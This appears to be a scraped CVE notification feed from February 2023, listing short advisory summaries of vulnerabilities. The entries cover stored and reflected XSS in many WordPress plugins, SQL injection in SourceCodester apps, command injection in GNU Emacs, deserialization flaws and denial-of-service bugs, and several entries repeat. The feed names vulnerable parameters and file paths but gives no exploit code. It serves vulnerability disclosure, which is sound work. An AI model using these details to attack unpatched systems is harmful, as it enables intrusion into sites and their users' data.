🚨 CVE-2023-0380The Easy Digital Downloads WordPress plugin before 3.1.0.5 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-21 16:30:00 |
🚨 CVE-2023-0419The Shortcode for Font Awesome WordPress plugin before 1.4.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-21 16:29:57 |
🚨 CVE-2023-0428The Watu Quiz WordPress plugin before 3.3.8.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2023-02-21 16:29:54 |
🚨 CVE-2023-0429The Watu Quiz WordPress plugin before 3.3.8.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-02-21 16:29:51 |
🚨 CVE-2023-0442The Loan Comparison WordPress plugin before 1.5.3 does not validate and escape some of its query parameters before outputting them back in a page/post via an embedded shortcode, which could allow an attacker to inject javascript into into the site via a crafted URL.🎖@cveNotify |
|
| 2023-02-21 16:29:47 |
🚨 CVE-2023-0453The WP Private Message WordPress plugin (bundled with the Superio theme as a required plugin) before 1.0.6 does not ensure that private messages to be accessed belong to the user making the requests. This allowing any authenticated users to access private messages belonging to other users by tampering the ID.🎖@cveNotify |
|
| 2023-02-21 11:30:04 |
🚨 CVE-2022-4897The BackupBuddy WordPress plugin before 8.8.3 does not sanitise and escape some parameters before outputting them back in various places, leading to Reflected Cross-Site Scripting🎖@cveNotify |
|
| 2023-02-21 11:30:03 |
🚨 CVE-2023-0059The Youzify WordPress plugin before 1.2.2 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-21 11:30:02 |
🚨 CVE-2023-0067The Timed Content WordPress plugin before 2.73 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-21 11:30:01 |
🚨 CVE-2023-0231The ShopLentor WordPress plugin before 2.5.4 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-21 11:30:00 |
🚨 CVE-2023-0232The ShopLentor WordPress plugin before 2.5.4 unserializes user input from cookies in order to track viewed products and user data, which could lead to PHP Object Injection.🎖@cveNotify |
|
| 2023-02-21 11:29:56 |
🚨 CVE-2023-0271The WP Font Awesome WordPress plugin before 1.7.9 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-21 11:29:55 |
🚨 CVE-2023-0285The Real Media Library WordPress plugin before 4.18.29 does not sanitise and escape the created folder names, which could allow users with the role of author and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-21 11:29:54 |
🚨 CVE-2023-0366The Loan Comparison WordPress plugin before 1.5.3 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-21 11:29:53 |
🚨 CVE-2023-0371The EmbedSocial WordPress plugin before 1.1.28 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-21 11:29:52 |
🚨 CVE-2023-0372The EmbedStories WordPress plugin before 0.7.5 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2023-02-21 11:29:48 |
🚨 CVE-2023-0375The Easy Affiliate Links WordPress plugin before 3.7.1 does not validate and escape some of its block options before outputting them back in a page/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-21 11:29:47 |
🚨 CVE-2023-0378The Greenshift WordPress plugin before 5.0 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-21 11:29:46 |
🚨 CVE-2023-0380The Easy Digital Downloads WordPress plugin before 3.1.0.5 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-21 11:29:45 |
🚨 CVE-2023-0419The Shortcode for Font Awesome WordPress plugin before 1.4.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-21 11:29:44 |
🚨 CVE-2023-0428The Watu Quiz WordPress plugin before 3.3.8.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2023-02-21 11:29:40 |
🚨 CVE-2023-0429The Watu Quiz WordPress plugin before 3.3.8.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2023-02-21 11:29:39 |
🚨 CVE-2023-0442The Loan Comparison WordPress plugin before 1.5.3 does not validate and escape some of its query parameters before outputting them back in a page/post via an embedded shortcode, which could allow an attacker to inject javascript into into the site via a crafted URL.🎖@cveNotify |
|
| 2023-02-21 11:29:38 |
🚨 CVE-2023-0453The WP Private Message WordPress plugin (bundled with the Superio theme as a required plugin) before 1.0.6 does not ensure that private messages to be accessed belong to the user making the requests. This allowing any authenticated users to access private messages belonging to other users by tampering the ID.🎖@cveNotify |
|
| 2023-02-21 11:29:37 |
🚨 CVE-2023-0540The GS Filterable Portfolio WordPress plugin before 1.6.1 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2023-02-21 07:29:48 |
🚨 CVE-2023-24575Dell Multifunction Printer E525w Driver and Software Suite, versions prior to 1.047.2022, A05, contain a local privilege escalation vulnerability that could be exploited by malicious users to compromise the affected system🎖@cveNotify |
|
| 2023-02-21 07:29:47 |
🚨 CVE-2023-26265The Borg theme before 1.1.19 for Backdrop CMS does not sufficiently sanitize path arguments that are passed in via a URL. The function borg_preprocess_page in the file template.php does not properly sanitize incoming path arguments before using them.🎖@cveNotify |
|
| 2023-02-21 07:29:46 |
🚨 CVE-2023-26266In AFL++ 4.05c, the CmpLog component uses the current working directory to resolve and execute unprefixed fuzzing targets, allowing code execution.🎖@cveNotify |
|
| 2023-02-21 07:29:45 |
🚨 CVE-2014-125089A vulnerability was found in cention-chatserver 3.8.0-rc1. It has been declared as problematic. Affected by this vulnerability is the function _formatBody of the file lib/InternalChatProtocol.fe. The manipulation of the argument body leads to cross site scripting. The attack can be launched remotely. Upgrading to version 3.9 is able to address this issue. The name of the patch is c4c0258bbd18f6915f97f91d5fee625384096a26. It is recommended to upgrade the affected component. The identifier VDB-221497 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-21 07:29:44 |
🚨 CVE-2022-48340In Gluster GlusterFS 11.0, there is an xlators/cluster/dht/src/dht-common.c dht_setxattr_mds_cbk use-after-free.🎖@cveNotify |
|
| 2023-02-21 07:29:43 |
🚨 CVE-2023-26249Knot Resolver before 5.6.0 enables attackers to consume its resources, launching amplification attacks and potentially causing a denial of service. Specifically, a single client query may lead to a hundred TCP connection attempts if a DNS server closes connections without providing a response.🎖@cveNotify |
|
| 2023-02-21 07:29:42 |
🚨 CVE-2023-26253In Gluster GlusterFS 11.0, there is an xlators/mount/fuse/src/fuse-bridge.c notify stack-based buffer over-read.🎖@cveNotify |
|
| 2023-02-21 07:29:41 |
🚨 CVE-2023-26242afu_mmio_region_get_by_offset in drivers/fpga/dfl-afu-region.c in the Linux kernel through 6.1.12 has an integer overflow.🎖@cveNotify |
|
| 2023-02-21 02:29:46 |
🚨 CVE-2023-26234JD-GUI 1.6.6 allows deserialization via UIMainWindowPreferencesProvider.singleInstance.🎖@cveNotify |
|
| 2023-02-21 02:29:45 |
🚨 CVE-2023-26235JD-GUI 1.6.6 allows XSS via util/net/InterProcessCommunicationUtil.java.🎖@cveNotify |
|
| 2023-02-21 02:29:44 |
🚨 CVE-2021-32853Erxes, an experience operating system (XOS) with a set of plugins, is vulnerable to cross-site scripting in versions 0.22.3 and prior. This results in client-side code execution. The victim must follow a malicious link or be redirected there from malicious web site. There are no known patches.🎖@cveNotify |
|
| 2023-02-21 02:29:43 |
🚨 CVE-2022-48337GNU Emacs through 28.2 allows attackers to execute commands via shell metacharacters in the name of a source-code file, because lib-src/etags.c uses the system C library function in its implementation of the etags program. For example, a victim may use the "etags -u *" command (suggested in the etags documentation) in a situation where the current working directory has contents that depend on untrusted input.🎖@cveNotify |
|
| 2023-02-21 02:29:42 |
🚨 CVE-2022-48338An issue was discovered in GNU Emacs through 28.2. In ruby-mode.el, the ruby-find-library-file function has a local command injection vulnerability. The ruby-find-library-file function is an interactive function, and bound to C-c C-f. Inside the function, the external command gem is called through shell-command-to-string, but the feature-name parameters are not escaped. Thus, malicious Ruby source files may cause commands to be executed.🎖@cveNotify |
|
| 2023-02-21 02:29:40 |
🚨 CVE-2022-48339An issue was discovered in GNU Emacs through 28.2. htmlfontify.el has a command injection vulnerability. In the hfy-istext-command function, the parameter file and parameter srcdir come from external input, and parameters are not escaped. If a file name or directory name contains shell metacharacters, code may be executed.🎖@cveNotify |
|
| 2023-02-21 02:29:39 |
🚨 CVE-2023-23452Missing Authentication for Critical Function in SICK FX0-GPNT v3 Firmware Version V3.04 and V3.05 allows an unprivileged remote attacker to achieve arbitrary remote code execution via maliciously crafted RK512 commands to the listener on TCP port 9000.🎖@cveNotify |
|
| 2023-02-21 02:29:38 |
🚨 CVE-2023-23453Missing Authentication for Critical Function in SICK FX0-GENT v3 Firmware Version V3.04 and V3.05 allows an unprivileged remote attacker to achieve arbitrary remote code execution via maliciously crafted RK512 commands to the listener on TCP port 9000.🎖@cveNotify |
|
| 2023-02-21 02:29:36 |
🚨 CVE-2023-24580An issue was discovered in the Multipart Request Parser in Django 3.2 before 3.2.18, 4.0 before 4.0.10, and 4.1 before 4.1.7. Passing certain inputs (e.g., an excessive number of parts) to multipart forms could result in too many open files or memory exhaustion, and provided a potential vector for a denial-of-service attack.🎖@cveNotify |
|
| 2023-02-20 23:29:37 |
🚨 CVE-2021-32851Mind-elixir is a free, open source mind map core. Prior to version 0.18.1, mind-elixir is prone to cross-site scripting when handling untrusted menus. This issue is patched in version 0.18.1🎖@cveNotify |
|
| 2023-02-20 23:29:36 |
🚨 CVE-2021-32852Countly, a product analytics solution, is vulnerable to cross-site scripting prior to version 21.11 of the community edition. The victim must follow a malicious link or be redirected there from malicious web site. The attacker must have an account or be able to create one. This issue is patched in version 21.11.🎖@cveNotify |
|
| 2023-02-20 22:29:39 |
🚨 CVE-2022-44216Gnuboard 5.5.4 and 5.5.5 is vulnerable to Insecure Permissions. An attacker can change password of all users without knowing victim's original password.🎖@cveNotify |
|
| 2023-02-20 22:29:38 |
🚨 CVE-2022-44666Windows Contacts Remote Code Execution Vulnerability.🎖@cveNotify |
|
| 2023-02-20 22:29:37 |
🚨 CVE-2022-3901Prototype Pollution in Visioweb.js 1.10.6 allows attackers to execute XSS on the client system.🎖@cveNotify |
|
| 2023-02-20 18:29:42 |
🚨 CVE-2023-24998Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attacker triggering a DoS with a malicious upload or series of uploads.🎖@cveNotify |
|
| 2023-02-20 18:29:38 |
🚨 CVE-2023-25570Apollo is a configuration management system. Prior to version 2.1.0, there are potential security issues if users expose apollo-configservice to the internet, which is not recommended. This is because there is no authentication feature enabled for the built-in eureka service. Malicious hackers may access eureka directly to mock apollo-configservice and apollo-adminservice. Login authentication for eureka was added in version 2.1.0. As a workaround, avoid exposing apollo-configservice to the internet.🎖@cveNotify |
|
| 2023-02-20 18:29:37 |
🚨 CVE-2023-25656notation-go is a collection of libraries for supporting Notation sign, verify, push, pull of oci artifacts. Prior to version 1.0.0-rc.3, notation-go users will find their application using excessive memory when verifying signatures and the application will be finally killed, and thus availability is impacted. The problem has been patched in the release v1.0.0-rc.3. Some workarounds are available. Users can review their own trust policy file and check if the identity string contains `=#`. Meanwhile, users should only put trusted certificates in their trust stores referenced by their own trust policy files, and make sure the `authenticity` validation is set to `enforce`.🎖@cveNotify |
|
| 2023-02-20 18:29:36 |
🚨 CVE-2023-25805versionn, software for changing version information across multiple files, has a command injection vulnerability in all versions prior to version 1.1.0. This issue is patched in version 1.1.0.🎖@cveNotify |
|
| 2023-02-20 16:29:44 |
🚨 CVE-2022-2097AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).🎖@cveNotify |
|
| 2023-02-20 13:29:42 |
🚨 CVE-2016-15026A vulnerability was found in 3breadt dd-plist 1.17 and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to xml external entity reference. An attack has to be approached locally. Upgrading to version 1.18 is able to address this issue. The name of the patch is 8c954e8d9f6f6863729e50105a8abf3f87fff74c. It is recommended to upgrade the affected component. VDB-221486 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-20 12:29:44 |
🚨 CVE-2014-125088A vulnerability was found in qt-users-jp silk 0.0.1. It has been declared as problematic. This vulnerability affects unknown code of the file contents/root/examples/header.qml. The manipulation of the argument model.key/model.value leads to cross site scripting. The attack can be initiated remotely. The name of the patch is bbc5d6eeea800025ef29edda3fd3c57836239eae. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-221488.🎖@cveNotify |
|
| 2023-02-20 12:29:43 |
🚨 CVE-2013-10019A vulnerability was found in OCLC-Research OAICat 1.5.61. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The attack may be initiated remotely. Upgrading to version 1.5.62 is able to address this issue. The name of the patch is 6cc65501869fa663bcd24a70b63f41f5cfe6b3e1. It is recommended to upgrade the affected component. The identifier VDB-221489 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-20 12:29:42 |
🚨 CVE-2023-0907A vulnerability, which was classified as problematic, has been found in Filseclab Twister Antivirus 8.17. Affected by this issue is some unknown functionality in the library ffsmon.sys of the component IoControlCode Handler. The manipulation leads to denial of service. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221456.🎖@cveNotify |
|
| 2023-02-20 12:29:40 |
🚨 CVE-2023-0908A vulnerability, which was classified as problematic, was found in Xoslab Easy File Locker 2.2.0.184. This affects the function MessageNotifyCallback in the library xlkfs.sys. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-221457 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-20 07:29:47 |
🚨 CVE-2023-26092Liima before 1.17.28 allows server-side template injection.🎖@cveNotify |
|
| 2023-02-20 07:29:46 |
🚨 CVE-2023-26093Liima before 1.17.28 allows Hibernate query language (HQL) injection, related to colToSort in the deployment filter.🎖@cveNotify |
|
| 2023-02-20 07:29:45 |
🚨 CVE-2022-48328app/Controller/Component/IndexFilterComponent.php in MISP before 2.4.167 mishandles ordered_url_params and additional_delimiters.🎖@cveNotify |
|
| 2023-02-20 07:29:43 |
🚨 CVE-2022-48329MISP before 2.4.166 unsafely allows users to use the order parameter, related to app/Model/Attribute.php, app/Model/GalaxyCluster.php, app/Model/Workflow.php, and app/Plugin/Assets/models/behaviors/LogableBehavior.php.🎖@cveNotify |
|
| 2023-02-20 07:29:42 |
🚨 CVE-2023-26081In Epiphany (aka GNOME Web) through 43.0, untrusted web content can trick users into exfiltrating passwords, because autofill occurs in sandboxed contexts.🎖@cveNotify |
|
| 2023-02-19 20:29:45 |
🚨 CVE-2014-125087A vulnerability was found in java-xmlbuilder up to 1.1. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to xml external entity reference. Upgrading to version 1.2 is able to address this issue. The name of the patch is e6fddca201790abab4f2c274341c0bb8835c3e73. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-221480.🎖@cveNotify |
|
| 2023-02-19 18:29:42 |
🚨 CVE-2012-10007A vulnerability was found in madgicweb BuddyStream Plugin up to 3.2.7. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file ShareBox.php. The manipulation of the argument content/link/shares leads to cross site scripting. The attack can be launched remotely. Upgrading to version 3.2.8 is able to address this issue. The name of the patch is 7d5b9a89a27711aad76fd55ab4cc4185b545a1d0. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-221479.🎖@cveNotify |
|
| 2023-02-19 18:29:41 |
🚨 CVE-2023-0919Missing Authentication for Critical Function in GitHub repository kareadita/kavita prior to 0.7.0.🎖@cveNotify |
|
| 2023-02-19 07:29:48 |
🚨 CVE-2021-34749A vulnerability in Server Name Identification (SNI) request filtering of Cisco Web Security Appliance (WSA), Cisco Firepower Threat Defense (FTD), and the Snort detection engine could allow an unauthenticated, remote attacker to bypass filtering technology on an affected device and exfiltrate data from a compromised host. This vulnerability is due to inadequate filtering of the SSL handshake. An attacker could exploit this vulnerability by using data from the SSL client hello packet to communicate with an external server. A successful exploit could allow the attacker to execute a command-and-control attack on a compromised host and perform additional data exfiltration attacks.🎖@cveNotify |
|
| 2023-02-19 07:29:47 |
🚨 CVE-2021-1223Multiple Cisco products are affected by a vulnerability in the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured file policy for HTTP. The vulnerability is due to incorrect handling of an HTTP range header. An attacker could exploit this vulnerability by sending crafted HTTP packets through an affected device. A successful exploit could allow the attacker to bypass configured file policy for HTTP packets and deliver a malicious payload.🎖@cveNotify |
|
| 2023-02-19 07:29:43 |
🚨 CVE-2021-1224Multiple Cisco products are affected by a vulnerability with TCP Fast Open (TFO) when used in conjunction with the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured file policy for HTTP. The vulnerability is due to incorrect detection of the HTTP payload if it is contained at least partially within the TFO connection handshake. An attacker could exploit this vulnerability by sending crafted TFO packets with an HTTP payload through an affected device. A successful exploit could allow the attacker to bypass configured file policy for HTTP packets and deliver a malicious payload.🎖@cveNotify |
|
| 2023-02-19 07:29:42 |
🚨 CVE-2020-3299Multiple Cisco products are affected by a vulnerability in the Snort detection engine that could allow an unauthenticated, remote attacker to bypass a configured File Policy for HTTP. The vulnerability is due to incorrect detection of modified HTTP packets used in chunked responses. An attacker could exploit this vulnerability by sending crafted HTTP packets through an affected device. A successful exploit could allow the attacker to bypass a configured File Policy for HTTP packets and deliver a malicious payload.🎖@cveNotify |
|
| 2023-02-19 07:29:41 |
🚨 CVE-2023-0914Improper Authorization in GitHub repository pixelfed/pixelfed prior to 0.11.4.🎖@cveNotify |
|
| 2023-02-19 00:29:49 |
🚨 CVE-2023-25167Discourse is an open source discussion platform. In affected versions a malicious user can cause a regular expression denial of service using a carefully crafted git URL. This issue is patched in the latest stable, beta and tests-passed versions of Discourse. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-02-19 00:29:48 |
🚨 CVE-2023-25396Privilege escalation in the MSI repair functionality in Caphyon Advanced Installer 20.0 and below allows attackers to access and manipulate system files.🎖@cveNotify |
|
| 2023-02-19 00:29:47 |
🚨 CVE-2023-23475IBM Infosphere Information Server 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 245423.🎖@cveNotify |
|
| 2023-02-19 00:29:46 |
🚨 CVE-2023-0690HashiCorp Boundary from 0.10.0 through 0.11.2 contain an issue where when using a PKI-based worker with a Key Management Service (KMS) defined in the configuration file, new credentials created after an automatic rotation may not have been encrypted via the intended KMS. This would result in the credentials being stored in plaintext on the Boundary PKI worker’s disk. This issue is fixed in version 0.12.0.🎖@cveNotify |
|
| 2023-02-19 00:29:44 |
🚨 CVE-2022-45527File upload vulnerability in Future-Depth Institutional Management Website (IMS) 1.0, allows unauthorized attackers to directly upload malicious files to the courseimg directory.🎖@cveNotify |
|
| 2023-02-19 00:29:43 |
🚨 CVE-2022-45755Cross-site scripting (XSS) vulnerability in EyouCMS v1.6.0 allows attackers to execute arbitrary code via the home page description on the basic information page.🎖@cveNotify |
|
| 2023-02-19 00:29:41 |
🚨 CVE-2022-45526SQL Injection vulnerability in Future-Depth Institutional Management Website (IMS) 1.0, allows attackers to execute arbitrary commands via the ad parameter to /admin_area/login_transfer.php.🎖@cveNotify |
|
| 2023-02-19 00:29:40 |
🚨 CVE-2022-42438IBM Cloud Pak for Multicloud Management Monitoring 2.0 and 2.3 allows users without admin roles access to admin functions by specifying direct URL paths. IBM X-Force ID: 238210.🎖@cveNotify |
|
| 2023-02-19 00:29:39 |
🚨 CVE-2022-35720IBM Sterling External Authentication Server 6.1.0 and IBM Sterling Secure Proxy 6.0.3 uses weaker than expected cryptographic algorithms during installation that could allow a local attacker to decrypt sensitive information. IBM X-Force ID: 231373.🎖@cveNotify |
|
| 2023-02-18 22:29:55 |
🚨 CVE-2023-0912A vulnerability classified as critical has been found in SourceCodester Auto Dealer Management System 1.0. This affects an unknown part of the file /adms/admin/?page=vehicles/view_transaction. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221481 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-18 22:29:51 |
🚨 CVE-2023-0744Improper Access Control in GitHub repository answerdev/answer prior to 1.0.4.🎖@cveNotify |
|
| 2023-02-18 22:29:50 |
🚨 CVE-2023-0361A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.🎖@cveNotify |
|
| 2023-02-18 22:29:49 |
🚨 CVE-2019-16884runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory.🎖@cveNotify |
|
| 2023-02-18 18:29:49 |
🚨 CVE-2022-47986IBM Aspera Faspex 4.4.2 Patch Level 1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.🎖@cveNotify |
|
| 2023-02-18 12:29:58 |
🚨 CVE-2023-0909A vulnerability, which was classified as problematic, was found in cxasm notepad-- 1.22. This affects an unknown part of the component Directory Comparison Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The associated identifier of this vulnerability is VDB-221475.🎖@cveNotify |
|
| 2023-02-18 12:29:57 |
🚨 CVE-2023-0902A vulnerability was found in SourceCodester Simple Food Ordering System 1.0. It has been classified as problematic. This affects an unknown part of the file process_order.php. The manipulation of the argument order leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-221451.🎖@cveNotify |
|
| 2023-02-18 12:29:56 |
🚨 CVE-2023-0903A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file edit-task.php. The manipulation of the argument task_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-221452.🎖@cveNotify |
|
| 2023-02-18 12:29:52 |
🚨 CVE-2023-0905A vulnerability classified as critical has been found in SourceCodester Employee Task Management System 1.0. Affected is an unknown function of the file changePasswordForEmployee.php. The manipulation leads to improper authentication. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-221454 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-18 12:29:51 |
🚨 CVE-2023-0906A vulnerability classified as critical was found in SourceCodester Online Pizza Ordering System 1.0. Affected by this vulnerability is the function delete_category of the file ajax.php of the component POST Parameter Handler. The manipulation leads to missing authentication. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-221455.🎖@cveNotify |
|
| 2023-02-18 12:29:50 |
🚨 CVE-2023-0908A vulnerability, which was classified as problematic, was found in Xoslab Easy File Locker 2.2.0.184. This affects the function MessageNotifyCallback in the library xlkfs.sys. The manipulation leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-221457 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-18 07:30:00 |
🚨 CVE-2023-0433Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1225.🎖@cveNotify |
|
| 2023-02-18 07:29:58 |
🚨 CVE-2022-47024A null pointer dereference issue was discovered in function gui_x11_create_blank_mouse in gui_x11.c in vim 8.1.2269 thru 9.0.0339 allows attackers to cause denial of service or other unspecified impacts.🎖@cveNotify |
|
| 2023-02-18 07:29:56 |
🚨 CVE-2022-40348Cross Site Scripting (XSS) vulnerability in Intern Record System version 1.0 in /intern/controller.php in 'name' and 'email' parameters, allows attackers to execute arbitrary code.🎖@cveNotify |
|
| 2023-02-18 07:29:54 |
🚨 CVE-2023-0901Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository pixelfed/pixelfed prior to 0.11.4.🎖@cveNotify |
|
| 2023-02-18 02:29:43 |
🚨 CVE-2021-32843HyperKit is a toolkit for embedding hypervisor capabilities in an application. In versions 0.20210107 and prior of HyperKit, `virtio.c` has is a call to `vc_cfgread` that does not check for null which when called makes the host crash. This issue may lead to a guest crashing the host causing a denial of service. This issue is fixed in commit df0e46c7dbfd81a957d85e449ba41b52f6f7beb4.🎖@cveNotify |
|
| 2023-02-18 02:29:42 |
🚨 CVE-2021-32844HyperKit is a toolkit for embedding hypervisor capabilities in an application. In versions 0.20210107 and prior of HyperKit, ` vi_pci_write` has is a call to `vc_cfgwrite` that does not check for null which when called makes the host crash. This issue may lead to a guest crashing the host causing a denial of service. This issue is fixed in commit 451558fe8aaa8b24e02e34106e3bb9fe41d7ad13.🎖@cveNotify |
|
| 2023-02-18 02:29:41 |
🚨 CVE-2021-32845HyperKit is a toolkit for embedding hypervisor capabilities in an application. In versions 0.20210107 and prior of HyperKit, the implementation of `qnotify` at `pci_vtrnd_notify` fails to check the return value of `vq_getchain`. This leads to `struct iovec iov;` being uninitialized and used to read memory in `len = (int) read(sc->vrsc_fd, iov.iov_base, iov.iov_len);` when an attacker is able to make `vq_getchain` fail. This issue may lead to a guest crashing the host causing a denial of service and, under certain circumstance, memory corruption. This issue is fixed in commit 41272a980197917df8e58ff90642d14dec8fe948.🎖@cveNotify |
|
| 2023-02-18 02:29:40 |
🚨 CVE-2021-32846HyperKit is a toolkit for embedding hypervisor capabilities in an application. In versions 0.20210107, function `pci_vtsock_proc_tx` in `virtio-sock` can lead to to uninitialized memory use. In this situation, there is a check for the return value to be less or equal to `VTSOCK_MAXSEGS`, but that check is not sufficient because the function can return `-1` if it finds an error it cannot recover from. Moreover, the negative return value will be used by `iovec_pull` in a while condition that can further lead to more corruption because the function is not designed to handle a negative `iov_len`. This issue may lead to a guest crashing the host causing a denial of service and, under certain circumstance, memory corruption. This issue is fixed in commit af5eba2360a7351c08dfd9767d9be863a50ebaba.🎖@cveNotify |
|
| 2023-02-17 23:30:01 |
🚨 CVE-2023-0482In RESTEasy the insecure File.createTempFile() is used in the DataSourceProvider, FileProvider and Mime4JWorkaround classes which creates temp files with insecure permissions that could be read by a local user.🎖@cveNotify |
|
| 2023-02-17 23:30:00 |
🚨 CVE-2023-22237After Affects versions 23.1 (and earlier), 22.6.3 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 23:29:59 |
🚨 CVE-2023-21574Photoshop version 23.5.3 (and earlier), 24.1 (and earlier) are affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 23:29:57 |
🚨 CVE-2023-21575Photoshop version 23.5.3 (and earlier), 24.1 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 23:29:56 |
🚨 CVE-2023-22238After Affects versions 23.1 (and earlier), 22.6.3 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-02-17 23:29:55 |
